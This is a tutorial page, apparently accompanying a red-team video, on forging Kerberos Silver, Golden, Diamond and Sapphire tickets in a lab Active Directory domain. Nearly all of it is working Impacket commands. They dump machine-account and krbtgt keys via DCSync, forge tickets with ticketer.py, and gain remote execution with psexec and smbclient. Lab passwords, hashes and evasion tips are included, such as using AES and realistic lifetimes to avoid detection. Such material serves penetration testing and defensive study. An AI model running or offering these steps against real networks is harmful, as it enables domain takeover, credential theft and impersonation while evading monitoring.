home / videos / kerberos-attacks-part3
Active Directory Kerberos Red Team OPSEC

Kerberos Attacks Part 3: Silver, Golden, Diamond & Sapphire Tickets

// part 3 · the finale of the Kerberos series
Kerberos Attacks Part 3: Silver, Golden, Diamond and Sapphire Tickets
overview

The finale of the Kerberos series. Instead of stealing a ticket, you build your own. Ticket forging creates Kerberos tickets without going through normal authentication, letting you impersonate a user or service. Four types, from the service-scoped Silver to the domain-wide Golden, and the stealthier Diamond and Sapphire that start from a legitimate ticket.

commands used
// silver ticket
// pick your target SPN
SPN / Service Access / Capability Required Key
CIFS SMB shares / file system access Host machine account
LDAP LDAP operations; DC account key can enable DCSync DC machine account
HOST + RPCSS WMI Host machine account
HOST + CIFS PsExec-style execution, scheduled tasks Host machine account
HOST + HTTP/WSMAN WinRM / PowerShell Remoting Host machine account
MSSQLSvc SQL access as sysadmin SQL service account
get the domain SID
lookupsid.py controller.local/Administrator:'P@$$W0rd'@10.114.132.238 0
dump the machine account AES key (DCSync — noisy)
# DCSync triggers a directory replication request, normally DC-to-DC traffic. # quieter methods exist, DCSync is used here for demonstration. grab the AES256 key. secretsdump.py controller.local/Administrator:'P@$$W0rd'@10.114.132.238 \ -just-dc-user 'CONTROLLER-1$'
forge the silver ticket (offline)
# prefer AES, it blends with modern Kerberos traffic (RC4 stands out). # set a realistic -duration, long default lifetimes get flagged. ticketer.py -aesKey "38ad99bc...d3e3d2ed" \ -domain-sid "S-1-5-21-432953485-3795405108-1502158860" \ -domain "controller.local" \ -spn "cifs/controller-1.controller.local" \ "Administrator" -duration 600
load and use the ticket
export KRB5CCNAME=Administrator.ccache smbclient.py -k -no-pass \ controller.local/Administrator@controller-1.controller.local
// golden ticket
dump the krbtgt AES key
secretsdump.py controller.local/Administrator:'P@$$W0rd'@10.114.132.238 \ -just-dc-user krbtgt
forge the golden ticket (offline)
# no -spn this time, a TGT works across services domain-wide ticketer.py -aesKey "dfb51898...6acf1033" \ -domain-sid "S-1-5-21-432953485-3795405108-1502158860" \ -domain "controller.local" \ "Administrator" -duration 10
load and use the ticket
export KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass \ controller.local/Administrator@controller-1.controller.local
// diamond ticket
request a legit TGT and modify it into a diamond
# -request pulls a real TGT first, then rewrites the PAC with the groups you set. # 512=Domain Admins, 513=Domain Users, 518/519/520=Schema/Enterprise/Group Policy admins ticketer.py -request -domain "controller.local" \ -user "lowpriv1" -password 'Pass123!' \ -aesKey 'dfb51898...6acf1033' \ -domain-sid "S-1-5-21-432953485-3795405108-1502158860" \ -groups 512,513,518,519,520 lowpriv1
inspect, load and use
# describeTicket.py shows the ticket's contents (etype, flags, PAC) export KRB5CCNAME=lowpriv1.ccache describeTicket.py lowpriv1.ccache psexec.py -k -no-pass \ controller.local/lowpriv1@controller-1.controller.local
// sapphire ticket
forge the sapphire ticket
# -impersonate triggers S4U2self+U2U to pull the target's real PAC. # if you hit KDC_ERR_TGT_REVOKED, add -user-id with the target's RID. ticketer.py -request -impersonate 'Administrator' \ -domain "controller.local" -user "lowpriv1" -password 'Pass123!' \ -aesKey 'dfb51898...6acf1033' \ -nthash '72cd714611b64cd4d5550cd2759db3f6' \ -domain-sid "S-1-5-21-432953485-3795405108-1502158860" lowpriv1
inspect, load and use
export KRB5CCNAME=lowpriv1.ccache describeTicket.py lowpriv1.ccache psexec.py -k -no-pass \ controller.local/Administrator@controller-1.controller.local